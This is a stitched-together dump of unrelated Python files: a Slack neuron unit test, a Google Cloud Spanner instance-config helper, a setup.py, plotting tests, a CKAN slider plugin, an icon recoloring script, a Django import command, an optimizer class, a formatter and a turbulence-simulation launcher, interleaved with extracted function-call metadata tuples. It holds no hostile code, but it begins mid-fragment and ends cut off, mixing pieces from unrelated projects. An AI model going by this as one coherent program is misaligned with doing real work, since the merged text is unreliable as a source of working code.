] | [((1044, 1176), 'praline.client.project.pipeline.stages.stage.stage', 'stage', ([], {'requirements': "[['project_directory']]", 'output': "['clang_format_style_file', 'clang_format_executable']", 'predicate': 'predicate'}), "(requirements=[['project_directory']], output=[\n 'clang_format_style_file', 'clang_format_executable'], predicate=predicate)\n", (1049, 1176), False, 'from praline.client.project.pipeline.stages.stage import stage\n'), ((2195, 2235), 'praline.common.file_system.join', 'join', (['project_directory', '""".clang-format"""'], {}), "(project_directory, '.clang-format')\n", (2199, 2235), False, 'from praline.common.file_system import FileSystem, join\n')] |
import unittest
from kalliope.core.NeuronModule import MissingParameterException
from kalliope.neurons.slack.slack import Slack
class TestSlack(unittest.TestCase):
def setUp(self):
self.slack_token="<PASSWORD>"
self.channel = "kalliochannel"
self.message = "kalliomessage"
def testParameters(self):
def run_test(parameters_to_test):
with self.assertRaises(MissingParameterException):
Slack(**parameters_to_test)
# empty
parameters = dict()
run_test(parameters)
# missing message
parameters = {
"slack_token": self.slack_token,
"channel": self.channel,
}
run_test(parameters)
# missing slack_token
parameters = {
"channel": self.channel,
"message": self.message
}
run_test(parameters)
# missing channel
parameters = {
"slack_token": self.slack_token,
"message": self.message
}
run_test(parameters) | [
"kalliope.neurons.slack.slack.Slack"
] | [((457, 484), 'kalliope.neurons.slack.slack.Slack', 'Slack', ([], {}), '(**parameters_to_test)\n', (462, 484), False, 'from kalliope.neurons.slack.slack import Slack\n')] |
# -*- coding: utf-8 -*- #
# Copyright 2016 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Spanner instanceConfigs API helper."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from apitools.base.py import list_pager
from googlecloudsdk.api_lib.util import apis
from googlecloudsdk.command_lib.ai import errors
from googlecloudsdk.command_lib.util.args import labels_util
from googlecloudsdk.core import properties
from googlecloudsdk.core import resources
import six
def Get(config):
"""Get the specified instance config."""
client = apis.GetClientInstance('spanner', 'v1')
msgs = apis.GetMessagesModule('spanner', 'v1')
ref = resources.REGISTRY.Parse(
config,
params={'projectsId': properties.VALUES.core.project.GetOrFail},
collection='spanner.projects.instanceConfigs')
req = msgs.SpannerProjectsInstanceConfigsGetRequest(
name=ref.RelativeName())
return client.projects_instanceConfigs.Get(req)
def List():
"""List instance configs in the project."""
client = apis.GetClientInstance('spanner', 'v1')
msgs = apis.GetMessagesModule('spanner', 'v1')
req = msgs.SpannerProjectsInstanceConfigsListRequest(
parent='projects/'+properties.VALUES.core.project.GetOrFail())
return list_pager.YieldFromList(
client.projects_instanceConfigs,
req,
field='instanceConfigs',
batch_size_attribute='pageSize')
def Delete(config, etag=None, validate_only=False):
"""Delete an instance config."""
client = apis.GetClientInstance('spanner', 'v1')
msgs = apis.GetMessagesModule('spanner', 'v1')
ref = resources.REGISTRY.Parse(
config,
params={'projectsId': properties.VALUES.core.project.GetOrFail},
collection='spanner.projects.instanceConfigs')
req = msgs.SpannerProjectsInstanceConfigsDeleteRequest(
name=ref.RelativeName(), etag=etag, validateOnly=validate_only)
return client.projects_instanceConfigs.Delete(req)
def Create(config,
display_name,
base_config,
replicas,
validate_only,
labels=None,
etag=None):
"""Create instance configs in the project."""
client = apis.GetClientInstance('spanner', 'v1')
msgs = apis.GetMessagesModule('spanner', 'v1')
project_ref = resources.REGISTRY.Create(
'spanner.projects', projectsId=properties.VALUES.core.project.GetOrFail)
config_ref = resources.REGISTRY.Parse(
config,
params={'projectsId': properties.VALUES.core.project.GetOrFail},
collection='spanner.projects.instanceConfigs')
replica_info = []
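  # Translate each requested replica's string type into the corresponding ReplicaInfo enum value.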
for replica in replicas:
# TODO(b/399093071): Change type to ReplicaInfo.TypeValueValuesEnum instead
# of str.
replica_type = msgs.ReplicaInfo.TypeValueValuesEnum.TYPE_UNSPECIFIED
if replica['type'] == 'READ_ONLY':
replica_type = msgs.ReplicaInfo.TypeValueValuesEnum.READ_ONLY
elif replica['type'] == 'READ_WRITE':
replica_type = msgs.ReplicaInfo.TypeValueValuesEnum.READ_WRITE
elif replica['type'] == 'WITNESS':
replica_type = msgs.ReplicaInfo.TypeValueValuesEnum.WITNESS
replica_info.append(
msgs.ReplicaInfo(location=replica['location'], type=replica_type))
# TODO(b/399093071): Implement --replicas-file option.
labels_message = {}
if labels is not None:
labels_message = msgs.InstanceConfig.LabelsValue(additionalProperties=[
msgs.InstanceConfig.LabelsValue.AdditionalProperty(
key=key, value=value) for key, value in six.iteritems(labels)
])
instance_config = msgs.InstanceConfig(
name=config_ref.RelativeName(),
displayName=display_name,
baseConfig=base_config,
labels=labels_message,
replicas=replica_info)
if etag:
instance_config.etag = etag
req = msgs.SpannerProjectsInstanceConfigsCreateRequest(
parent=project_ref.RelativeName(),
instanceConfigId=config,
instanceConfig=instance_config,
validateOnly=validate_only)
return client.projects_instanceConfigs.Create(req)
def Patch(args):
"""Update an instance config."""
client = apis.GetClientInstance('spanner', 'v1')
msgs = apis.GetMessagesModule('spanner', 'v1')
ref = resources.REGISTRY.Parse(
args.config,
params={'projectsId': properties.VALUES.core.project.GetOrFail},
collection='spanner.projects.instanceConfigs')
instance_config = msgs.InstanceConfig(name=ref.RelativeName())
update_mask = []
if args.display_name is not None:
instance_config.displayName = args.display_name
update_mask.append('display_name')
if args.etag is not None:
instance_config.etag = args.etag
def GetLabels():
req = msgs.SpannerProjectsInstanceConfigsGetRequest(name=ref.RelativeName())
return client.projects_instanceConfigs.Get(req).labels
labels_update = labels_util.ProcessUpdateArgsLazy(
args, msgs.InstanceConfig.LabelsValue, GetLabels)
if labels_update.needs_update:
instance_config.labels = labels_update.labels
update_mask.append('labels')
if not update_mask:
raise errors.NoFieldsSpecifiedError('No updates requested.')
req = msgs.SpannerProjectsInstanceConfigsPatchRequest(
name=ref.RelativeName(),
instanceConfig=instance_config,
updateMask=','.join(update_mask),
validateOnly=args.validate_only)
return client.projects_instanceConfigs.Patch(req)
| [
"six.iteritems",
"googlecloudsdk.command_lib.util.args.labels_util.ProcessUpdateArgsLazy",
"googlecloudsdk.api_lib.util.apis.GetClientInstance",
"googlecloudsdk.core.properties.VALUES.core.project.GetOrFail",
"googlecloudsdk.core.resources.REGISTRY.Parse",
"apitools.base.py.list_pager.YieldFromList",
"googlecloudsdk.command_lib.ai.errors.NoFieldsSpecifiedError",
"googlecloudsdk.core.resources.REGISTRY.Create",
"googlecloudsdk.api_lib.util.apis.GetMessagesModule"
] | [((1140, 1179), 'googlecloudsdk.api_lib.util.apis.GetClientInstance', 'apis.GetClientInstance', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (1162, 1179), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((1189, 1228), 'googlecloudsdk.api_lib.util.apis.GetMessagesModule', 'apis.GetMessagesModule', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (1211, 1228), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((1237, 1386), 'googlecloudsdk.core.resources.REGISTRY.Parse', 'resources.REGISTRY.Parse', (['config'], {'params': "{'projectsId': properties.VALUES.core.project.GetOrFail}", 'collection': '"""spanner.projects.instanceConfigs"""'}), "(config, params={'projectsId': properties.VALUES.\n core.project.GetOrFail}, collection='spanner.projects.instanceConfigs')\n", (1261, 1386), False, 'from googlecloudsdk.core import resources\n'), ((1608, 1647), 'googlecloudsdk.api_lib.util.apis.GetClientInstance', 'apis.GetClientInstance', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (1630, 1647), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((1657, 1696), 'googlecloudsdk.api_lib.util.apis.GetMessagesModule', 'apis.GetMessagesModule', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (1679, 1696), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((1831, 1956), 'apitools.base.py.list_pager.YieldFromList', 'list_pager.YieldFromList', (['client.projects_instanceConfigs', 'req'], {'field': '"""instanceConfigs"""', 'batch_size_attribute': '"""pageSize"""'}), "(client.projects_instanceConfigs, req, field=\n 'instanceConfigs', batch_size_attribute='pageSize')\n", (1855, 1956), False, 'from apitools.base.py import list_pager\n'), ((2077, 2116), 'googlecloudsdk.api_lib.util.apis.GetClientInstance', 'apis.GetClientInstance', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (2099, 2116), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((2126, 2165), 'googlecloudsdk.api_lib.util.apis.GetMessagesModule', 'apis.GetMessagesModule', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (2148, 2165), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((2174, 2323), 'googlecloudsdk.core.resources.REGISTRY.Parse', 'resources.REGISTRY.Parse', (['config'], {'params': "{'projectsId': properties.VALUES.core.project.GetOrFail}", 'collection': '"""spanner.projects.instanceConfigs"""'}), "(config, params={'projectsId': properties.VALUES.\n core.project.GetOrFail}, collection='spanner.projects.instanceConfigs')\n", (2198, 2323), False, 'from googlecloudsdk.core import resources\n'), ((2742, 2781), 'googlecloudsdk.api_lib.util.apis.GetClientInstance', 'apis.GetClientInstance', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (2764, 2781), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((2791, 2830), 'googlecloudsdk.api_lib.util.apis.GetMessagesModule', 'apis.GetMessagesModule', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (2813, 2830), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((2847, 2950), 'googlecloudsdk.core.resources.REGISTRY.Create', 'resources.REGISTRY.Create', (['"""spanner.projects"""'], {'projectsId': 'properties.VALUES.core.project.GetOrFail'}), "('spanner.projects', projectsId=properties.VALUES.\n core.project.GetOrFail)\n", (2872, 2950), False, 'from googlecloudsdk.core import resources\n'), ((2968, 3117), 'googlecloudsdk.core.resources.REGISTRY.Parse', 'resources.REGISTRY.Parse', (['config'], {'params': "{'projectsId': 
properties.VALUES.core.project.GetOrFail}", 'collection': '"""spanner.projects.instanceConfigs"""'}), "(config, params={'projectsId': properties.VALUES.\n core.project.GetOrFail}, collection='spanner.projects.instanceConfigs')\n", (2992, 3117), False, 'from googlecloudsdk.core import resources\n'), ((4656, 4695), 'googlecloudsdk.api_lib.util.apis.GetClientInstance', 'apis.GetClientInstance', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (4678, 4695), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((4705, 4744), 'googlecloudsdk.api_lib.util.apis.GetMessagesModule', 'apis.GetMessagesModule', (['"""spanner"""', '"""v1"""'], {}), "('spanner', 'v1')\n", (4727, 4744), False, 'from googlecloudsdk.api_lib.util import apis\n'), ((4753, 4912), 'googlecloudsdk.core.resources.REGISTRY.Parse', 'resources.REGISTRY.Parse', (['args.config'], {'params': "{'projectsId': properties.VALUES.core.project.GetOrFail}", 'collection': '"""spanner.projects.instanceConfigs"""'}), "(args.config, params={'projectsId': properties.\n VALUES.core.project.GetOrFail}, collection=\n 'spanner.projects.instanceConfigs')\n", (4777, 4912), False, 'from googlecloudsdk.core import resources\n'), ((5380, 5467), 'googlecloudsdk.command_lib.util.args.labels_util.ProcessUpdateArgsLazy', 'labels_util.ProcessUpdateArgsLazy', (['args', 'msgs.InstanceConfig.LabelsValue', 'GetLabels'], {}), '(args, msgs.InstanceConfig.LabelsValue,\n GetLabels)\n', (5413, 5467), False, 'from googlecloudsdk.command_lib.util.args import labels_util\n'), ((5620, 5674), 'googlecloudsdk.command_lib.ai.errors.NoFieldsSpecifiedError', 'errors.NoFieldsSpecifiedError', (['"""No updates requested."""'], {}), "('No updates requested.')\n", (5649, 5674), False, 'from googlecloudsdk.command_lib.ai import errors\n'), ((1778, 1820), 'googlecloudsdk.core.properties.VALUES.core.project.GetOrFail', 'properties.VALUES.core.project.GetOrFail', ([], {}), '()\n', (1818, 1820), False, 'from googlecloudsdk.core import properties\n'), ((4063, 4084), 'six.iteritems', 'six.iteritems', (['labels'], {}), '(labels)\n', (4076, 4084), False, 'import six\n')] |
from setuptools import setup
import pkg_resources
import autocomplete
def get_metadata_version():
"""
Tries to get the version from the django_autocomplete.egg-info directory.
"""
try:
pkg = list(pkg_resources.find_distributions('.', True))[0]
except IndexError:
return autocomplete.__version__
return pkg.version
version = autocomplete.get_mercurial_version() or get_metadata_version()
setup(
name = 'django-autocomplete',
version = version,
description = 'autocomplete utilities for django',
author = '<NAME>',
author_email = '<EMAIL>',
url = 'http://bitbucket.org/tyrion/django-autocomplete',
download_url = 'http://bitbucket.org/tyrion/django-autocomplete/downloads',
packages = ['autocomplete'],
include_package_data = True,
classifiers = [
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities'
],
)
| [
"pkg_resources.find_distributions",
"autocomplete.get_mercurial_version",
"setuptools.setup"
] | [((431, 1075), 'setuptools.setup', 'setup', ([], {'name': '"""django-autocomplete"""', 'version': 'version', 'description': '"""autocomplete utilities for django"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""http://bitbucket.org/tyrion/django-autocomplete"""', 'download_url': '"""http://bitbucket.org/tyrion/django-autocomplete/downloads"""', 'packages': "['autocomplete']", 'include_package_data': '(True)', 'classifiers': "['Development Status :: 4 - Beta', 'Environment :: Web Environment',\n 'Framework :: Django', 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent', 'Programming Language :: Python',\n 'Topic :: Utilities']"}), "(name='django-autocomplete', version=version, description=\n 'autocomplete utilities for django', author='<NAME>', author_email=\n '<EMAIL>', url='http://bitbucket.org/tyrion/django-autocomplete',\n download_url=\n 'http://bitbucket.org/tyrion/django-autocomplete/downloads', packages=[\n 'autocomplete'], include_package_data=True, classifiers=[\n 'Development Status :: 4 - Beta', 'Environment :: Web Environment',\n 'Framework :: Django', 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent', 'Programming Language :: Python',\n 'Topic :: Utilities'])\n", (436, 1075), False, 'from setuptools import setup\n'), ((367, 403), 'autocomplete.get_mercurial_version', 'autocomplete.get_mercurial_version', ([], {}), '()\n', (401, 403), False, 'import autocomplete\n'), ((222, 265), 'pkg_resources.find_distributions', 'pkg_resources.find_distributions', (['"""."""', '(True)'], {}), "('.', True)\n", (254, 265), False, 'import pkg_resources\n')] |
# -*- coding: utf-8 -*-
"""Testing the functions in typhon.plots.
"""
import os
from typhon import plots
class TestPlots:
"""Testing the plot functions."""
def test_figsize(self):
"""Test golden ratio for figures sizes."""
ret = plots.figsize(10)
assert ret == (10, 6.1803398874989481)
def test_get_subplot_arrangement(self):
"""Test the determination of subplot arrangements."""
shape = plots.get_subplot_arrangement(8)
assert shape == (3, 3)
def test_get_available_styles(self):
"""Check matplotlib stylesheet paths.
        This test checks the consistency of the inputs and outputs
        of styles() and get_available_styles().
"""
style_paths = [
plots.styles(s) for s in plots.get_available_styles()]
assert all(os.path.isfile(s) for s in style_paths)
| [
"typhon.plots.get_subplot_arrangement",
"typhon.plots.styles",
"os.path.isfile",
"typhon.plots.get_available_styles",
"typhon.plots.figsize"
] | [((256, 273), 'typhon.plots.figsize', 'plots.figsize', (['(10)'], {}), '(10)\n', (269, 273), False, 'from typhon import plots\n'), ((445, 477), 'typhon.plots.get_subplot_arrangement', 'plots.get_subplot_arrangement', (['(8)'], {}), '(8)\n', (474, 477), False, 'from typhon import plots\n'), ((758, 773), 'typhon.plots.styles', 'plots.styles', (['s'], {}), '(s)\n', (770, 773), False, 'from typhon import plots\n'), ((783, 811), 'typhon.plots.get_available_styles', 'plots.get_available_styles', ([], {}), '()\n', (809, 811), False, 'from typhon import plots\n'), ((833, 850), 'os.path.isfile', 'os.path.isfile', (['s'], {}), '(s)\n', (847, 850), False, 'import os\n')] |
# encoding: utf-8
import ckan.plugins as plugins
import ckan.plugins.toolkit as toolkit
import logging
try:
from ckan.common import config # CKAN 2.7 and later
except ImportError:
    from pylons import config # CKAN 2.6 and earlier
log = logging.getLogger(__name__)
def dataset_count():
"""Return a count of all datasets"""
count = 0
result = toolkit.get_action('package_search')({}, {'rows': 1})
if result.get('count'):
count = result.get('count')
return count
def get_hero_images():
resources = []
try:
package_id = config.get('ckanext.heroslider.package_id', 'hero-slider-images')
result = toolkit.get_action('package_show')({}, {'id': package_id})
resource_list = result.get('resources')
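        # Keep only the URLs of JPEG/PNG resources attached to the configured slider dataset.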
for item in resource_list:
if item.get('format') in ['JPEG','PNG']:
if item.get('url'):
resources.append(item.get('url'))
    except Exception:
log.debug('Getting Hero images failed')
return resources
class HerosliderPlugin(plugins.SingletonPlugin):
plugins.implements(plugins.IConfigurer)
plugins.implements(plugins.ITemplateHelpers)
# IConfigurer
def update_config(self, config_):
toolkit.add_template_directory(config_, 'templates')
toolkit.add_public_directory(config_, 'public')
toolkit.add_resource('fanstatic', 'heroslider')
# ITemplateHelpers
def get_helpers(self):
return {
'hero_dataset_count': dataset_count,
'get_hero_images': get_hero_images,
}
| [
"ckan.plugins.implements",
"pylons.config.get",
"ckan.plugins.toolkit.add_template_directory",
"ckan.plugins.toolkit.get_action",
"ckan.plugins.toolkit.add_public_directory",
"ckan.plugins.toolkit.add_resource",
"logging.getLogger"
] | [((243, 270), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (260, 270), False, 'import logging\n'), ((1074, 1113), 'ckan.plugins.implements', 'plugins.implements', (['plugins.IConfigurer'], {}), '(plugins.IConfigurer)\n', (1092, 1113), True, 'import ckan.plugins as plugins\n'), ((1118, 1162), 'ckan.plugins.implements', 'plugins.implements', (['plugins.ITemplateHelpers'], {}), '(plugins.ITemplateHelpers)\n', (1136, 1162), True, 'import ckan.plugins as plugins\n'), ((362, 398), 'ckan.plugins.toolkit.get_action', 'toolkit.get_action', (['"""package_search"""'], {}), "('package_search')\n", (380, 398), True, 'import ckan.plugins.toolkit as toolkit\n'), ((570, 635), 'pylons.config.get', 'config.get', (['"""ckanext.heroslider.package_id"""', '"""hero-slider-images"""'], {}), "('ckanext.heroslider.package_id', 'hero-slider-images')\n", (580, 635), False, 'from pylons import config\n'), ((1229, 1281), 'ckan.plugins.toolkit.add_template_directory', 'toolkit.add_template_directory', (['config_', '"""templates"""'], {}), "(config_, 'templates')\n", (1259, 1281), True, 'import ckan.plugins.toolkit as toolkit\n'), ((1290, 1337), 'ckan.plugins.toolkit.add_public_directory', 'toolkit.add_public_directory', (['config_', '"""public"""'], {}), "(config_, 'public')\n", (1318, 1337), True, 'import ckan.plugins.toolkit as toolkit\n'), ((1346, 1393), 'ckan.plugins.toolkit.add_resource', 'toolkit.add_resource', (['"""fanstatic"""', '"""heroslider"""'], {}), "('fanstatic', 'heroslider')\n", (1366, 1393), True, 'import ckan.plugins.toolkit as toolkit\n'), ((653, 687), 'ckan.plugins.toolkit.get_action', 'toolkit.get_action', (['"""package_show"""'], {}), "('package_show')\n", (671, 687), True, 'import ckan.plugins.toolkit as toolkit\n')] |
'''
This file changes icon color from black to white, so the icon color can be
changed in code.
Icon images are from https://github.com/iconic/open-iconic/tree/master/png
'''
import os
from PIL import Image # https://pillow.readthedocs.io/en/stable/
def find_files():
""" Finds all files from icons folder that name ends with .png """
directory = os.fsencode( "icons/") # Gets folder where icons are located
for file in os.listdir(directory): # Gets every file from folder
filename = os.fsdecode(file)
if filename.endswith(".png"):
change_color("icons/" + filename)
continue
else:
continue
def change_color(image):
""" Changes every black pixel to white from image that was send to it. Skips transperent pixels """
newimage = Image.open(image)
    for x in range(newimage.size[0]):  # Goes through every pixel of the image along the X axis
        for y in range(newimage.size[1]):  # In Y axis
            r,g,b,a = newimage.getpixel((x,y))  # Get the pixel's RGBA color
            if r == 0 and g == 0 and b == 0 and a > 0:  # If pixel is black and not transparent.
                newimage.putpixel((x,y), (255,255,255,a))  # Change color to white. Keep transparency.
newimage.save(image) # Saves a file over the old one.
| [
"os.fsdecode",
"os.fsencode",
"os.listdir",
"PIL.Image.open"
] | [((370, 391), 'os.fsencode', 'os.fsencode', (['"""icons/"""'], {}), "('icons/')\n", (381, 391), False, 'import os\n'), ((449, 470), 'os.listdir', 'os.listdir', (['directory'], {}), '(directory)\n', (459, 470), False, 'import os\n'), ((832, 849), 'PIL.Image.open', 'Image.open', (['image'], {}), '(image)\n', (842, 849), False, 'from PIL import Image\n'), ((521, 538), 'os.fsdecode', 'os.fsdecode', (['file'], {}), '(file)\n', (532, 538), False, 'import os\n')] |
from django.core.management.base import BaseCommand
from reader.importer.PerseusBatchImporter import PerseusBatchImporter
from reader.importer.batch_import import JSONImportPolicy
import os
import sys
class Command(BaseCommand):
help = "Imports all Perseus XML documents from a directory that match the import policy"
def add_arguments(self, parser):
parser.add_argument('-d', '--directory',
dest='directory',
help='The directory containing the files to import')
parser.add_argument('-o', '--overwrite',
action="store_true",
dest="overwrite",
default=False,
help="Overwrite and replace existing items")
parser.add_argument("-t", "--test",
action="store_true",
dest="test",
help="Output the import parameters for any works that would be imported")
def handle(self, *args, **options):
directory = options['directory']
if directory is None and len(args) > 0:
directory = args[0]
# Validate the arguments
if directory is None:
print("No directory was provided to import")
return
overwrite = options['overwrite']
if overwrite is None:
overwrite = False
elif overwrite in [True, False]:
pass # Already a boolean
elif overwrite.lower() in ["true", "1"]:
overwrite = True
else:
overwrite = False
test = options['test']
if test is None:
test = False
elif test in [True, False]:
pass # Already a boolean
elif test.lower() in ["true", "1"]:
test = True
else:
test = False
# Get the path to the import policy accounting for the fact that the command may be run outside of the path where manage.py resides
import_policy_file = os.path.join( os.path.split(sys.argv[0])[0], "reader", "importer", "perseus_import_policy.json")
selection_policy = JSONImportPolicy()
selection_policy.load_policy( import_policy_file )
perseus_batch_importer = PerseusBatchImporter(
perseus_directory= directory,
book_selection_policy = selection_policy.should_be_processed,
overwrite_existing = overwrite,
test = test)
if test:
print("Testing import for files from", directory)
else:
print("Importing files from", directory)
perseus_batch_importer.do_import()
if test:
print("Files from the", directory, "evaluated")
else:
print("Files from the", directory, "directory successfully imported")
| [
"reader.importer.batch_import.JSONImportPolicy",
"os.path.split",
"reader.importer.PerseusBatchImporter.PerseusBatchImporter"
] | [((2171, 2189), 'reader.importer.batch_import.JSONImportPolicy', 'JSONImportPolicy', ([], {}), '()\n', (2187, 2189), False, 'from reader.importer.batch_import import JSONImportPolicy\n'), ((2294, 2453), 'reader.importer.PerseusBatchImporter.PerseusBatchImporter', 'PerseusBatchImporter', ([], {'perseus_directory': 'directory', 'book_selection_policy': 'selection_policy.should_be_processed', 'overwrite_existing': 'overwrite', 'test': 'test'}), '(perseus_directory=directory, book_selection_policy=\n selection_policy.should_be_processed, overwrite_existing=overwrite,\n test=test)\n', (2314, 2453), False, 'from reader.importer.PerseusBatchImporter import PerseusBatchImporter\n'), ((2050, 2076), 'os.path.split', 'os.path.split', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (2063, 2076), False, 'import os\n')] |
"""An "optimizer" that draws random samples.
Scientific Machine Learning Benchmark
A benchmark of regression models in chem- and materials informatics.
2019-2020, Citrine Informatics.
"""
from typing import Optional, Any
from smlb import (
params,
Random,
RandomVectorSampler,
VectorSpaceData,
Optimizer,
TrackedTransformation,
)
class RandomOptimizer(Optimizer, Random):
"""Draws random samples.
Parameters:
num_samples: the number of random samples to draw
domain: optional domain from which to draw values. If not provided, then the
optimization domain is taken to be that of `data` parameter passed to `optimize()`.
rng: pseudo-random number generator
"""
def __init__(self, num_samples: int, domain: Optional[Any] = None, rng=None, **kwargs):
super().__init__(rng=rng, **kwargs)
self._num_samples = params.integer(num_samples, above=0)
self._sampler = RandomVectorSampler(size=self._num_samples, domain=domain, rng=rng)
def _minimize(self, data: VectorSpaceData, function_tracker: TrackedTransformation):
"""Generate num_samples random samples and evaluate them."""
samples = self._sampler.apply(data)
function_tracker.apply(samples)
| [
"smlb.RandomVectorSampler",
"smlb.params.integer"
] | [((903, 939), 'smlb.params.integer', 'params.integer', (['num_samples'], {'above': '(0)'}), '(num_samples, above=0)\n', (917, 939), False, 'from smlb import params, Random, RandomVectorSampler, VectorSpaceData, Optimizer, TrackedTransformation\n'), ((964, 1031), 'smlb.RandomVectorSampler', 'RandomVectorSampler', ([], {'size': 'self._num_samples', 'domain': 'domain', 'rng': 'rng'}), '(size=self._num_samples, domain=domain, rng=rng)\n', (983, 1031), False, 'from smlb import params, Random, RandomVectorSampler, VectorSpaceData, Optimizer, TrackedTransformation\n')] |
try:
import orjson as json
except ImportError:
import json
import toml
import yaml
def format_requirements(data: dict) -> str:
result = []
for group, values in data.items():
result.append(f"### {group.upper()}\n")
for extras, version in values.items():
result.append(f"{extras}=={version}\n")
return "".join(result)
def formatter(data: dict, format: str) -> str:
if format == "json":
proxy = json.dumps(data)
if isinstance(proxy, bytes):
proxy = proxy.decode()
return proxy
elif format == "toml":
return toml.dumps(data)
elif format == "yaml":
return yaml.dump(data)
elif format == "requirements.txt":
return format_requirements(data)
else:
raise TypeError(f"Invalid format {format}")
| [
"toml.dumps",
"yaml.dump",
"json.dumps"
] | [((457, 473), 'json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (467, 473), False, 'import json\n'), ((609, 625), 'toml.dumps', 'toml.dumps', (['data'], {}), '(data)\n', (619, 625), False, 'import toml\n'), ((668, 683), 'yaml.dump', 'yaml.dump', (['data'], {}), '(data)\n', (677, 683), False, 'import yaml\n')] |
#!/usr/bin/env python3
import os, numpy as np, argparse
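# Empirical turbulence scalings: etaFit is the Kolmogorov length scale (nu^3/eps)^(1/4);
# relFit and lambdaFit appear to be fitted estimates of the Taylor-scale Reynolds number
# and the Taylor microscale, respectively.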
def relFit(nu, eps): return 7.33972668 * np.power(eps, 1/6.0) / np.sqrt(nu)
def etaFit(nu, eps): return np.power(eps, -0.25) * np.power(nu, 0.75)
def lambdaFit(nu, eps): return 5.35507603 * np.power(eps, -1/6.0) * np.sqrt(nu)
def runspec(nu, eps, run, cs=None):
if cs is not None:
return "HITBND_LES_EXT2pi_EPS%.03f_NU%.04f_CS%.02f_RUN%d" \
           % (eps, nu, cs, run)
else:
return "HITBND_DNS_EXT2pi_EPS%.03f_NU%.04f_RUN%d" \
% (eps, nu, run)
def getSettings(nu, eps, cs):
if cs is not None:
options = '-sgs SSM -cs %f -bpdx 4 -bpdy 4 -bpdz 4 -CFL 0.1 ' % cs
else:
options = '-bpdx 12 -bpdy 12 -bpdz 12 -CFL 0.02 '
tAnalysis = np.sqrt(nu / eps)
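  # The analysis/dump interval is the Kolmogorov time scale sqrt(nu/eps).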
return options + '-extentx 6.2831853072 -dump2D 0 -dump3D 0 ' \
'-tdump 1 -BC_x periodic -BC_y periodic -BC_z periodic ' \
'-spectralIC fromFit -initCond HITurbulence -tAnalysis %f ' \
'-compute-dissipation 1 -nprocsx 1 -nprocsy 1 -nprocsz 1 ' \
'-spectralForcing 1 -tend 100 -keepMomentumConstant 1 ' \
'-analysis HIT -nu %f -energyInjectionRate %f ' \
% (tAnalysis, nu, eps)
def launchEuler(nu, eps, run):
runname = runspec(nu, eps, run)
print(runname)
tAnalysis = np.sqrt(nu / eps)
os.system("export NU=%f \n export EPS=%f \n export TANALYSIS=%f \n " \
"echo $NU $EPS \n ./launchEuler.sh settingsHIT_DNS.sh %s " \
% (nu, eps, tAnalysis, runname) )
def launchDaint(nCases, les):
SCRATCH = os.getenv('SCRATCH')
HOME = os.getenv('HOME')
f = open('HIT_sbatch','w')
f.write('#!/bin/bash -l \n')
if les: f.write('#SBATCH --job-name=LES_HIT \n')
else: f.write('#SBATCH --job-name=DNS_HIT \n')
f.write('#SBATCH --time=24:00:00 \n')
f.write('#SBATCH --output=out.%j.%a.txt \n')
f.write('#SBATCH --error=err.%j.%a.txt \n')
f.write('#SBATCH --constraint=gpu \n')
f.write('#SBATCH --account=s929 \n')
f.write('#SBATCH --array=0-%d \n' % (nCases-1))
#f.write('#SBATCH --partition=normal \n')
#f.write('#SBATCH --ntasks-per-node=1 \n')
f.write('ind=$SLURM_ARRAY_TASK_ID \n')
if les:
f.write('RUNDIRN=`./launchLESHIT.py --LES --case ${ind} --printName` \n')
f.write('OPTIONS=`./launchLESHIT.py --LES --case ${ind} --printOptions` \n')
else:
f.write('RUNDIRN=`./launchLESHIT.py --case ${ind} --printName` \n')
f.write('OPTIONS=`./launchLESHIT.py --case ${ind} --printOptions` \n')
f.write('mkdir -p %s/CubismUP3D/${RUNDIRN} \n' % SCRATCH)
f.write('cd %s/CubismUP3D/${RUNDIRN} \n' % SCRATCH)
f.write('cp %s/CubismUP_3D/bin/simulation ./exec \n' % HOME)
f.write('export OMP_NUM_THREADS=12 \n')
f.write('export CRAY_CUDA_MPS=1 \n')
f.write('srun --ntasks 1 --ntasks-per-node=1 ./exec ${OPTIONS} \n')
f.close()
os.system('sbatch HIT_sbatch')
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description = "Compute a target file for RL agent from DNS data.")
parser.add_argument('--printName', dest='printName',
action='store_true', help="Only print run name.")
parser.set_defaults(printName=False)
parser.add_argument('--printOptions', dest='printOptions',
action='store_true', help="Only print run options.")
parser.set_defaults(printOptions=False)
parser.add_argument('--launchDaint', dest='launchDaint',
action='store_true', help="Only print run options.")
